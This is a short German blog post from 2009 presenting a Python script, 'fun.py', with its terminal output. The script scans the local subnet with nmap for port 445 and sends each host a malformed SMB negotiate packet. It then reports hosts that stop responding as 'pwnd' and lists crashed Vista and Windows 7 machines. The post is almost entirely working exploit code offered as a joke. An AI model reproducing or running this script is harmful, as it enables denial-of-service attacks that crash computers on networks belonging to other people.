Ich sollte lernen!
Das kommt dabei raus:
oxygen-mobile:~ python fun.py scanning subnet 192.168.1.3/24 sending exploit to 192.168.1.3 # Samba sending exploit to 192.168.1.13 # Vista pwnd 192.168.1.13 sending exploit to 192.168.1.14 # Windows 7
fun.py:
#!/usr/bin/python from socket import socket,error from time import sleep from os import popen for ownip in popen("LANG=C ip addr | grep 'inet ' | grep -v ' lo' | awk '{print $2}'").readlines(): print("scanning subnet %s" %ownip ) for neighborip in popen(" LANG=C nmap -n -sX --open -p445 %s |grep 'Interesting ports' | awk '{ print $4}' | tr -d ':' " %ownip.strip() ).readlines(): print("sending exploit to %s" %neighborip) host = neighborip, 445 buff = ( "\x00\x00\x00\x90" "\xff\x53\x4d\x42" "\x72\x00\x00\x00" "\x00\x18\x53\xc8" "\x00\x26" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) try: s = socket() s.settimeout(1.0) s.connect(host) s.send(buff) s.close() except error, msg: continue sleep(2) try: s = socket() s.settimeout(1.0) s.connect(host) s.close() except error, msg: print("pwnd %s" %neighborip)
jetzt kommentieren? Do, 10. Sep 2009 um 18:30 Uhr Christian
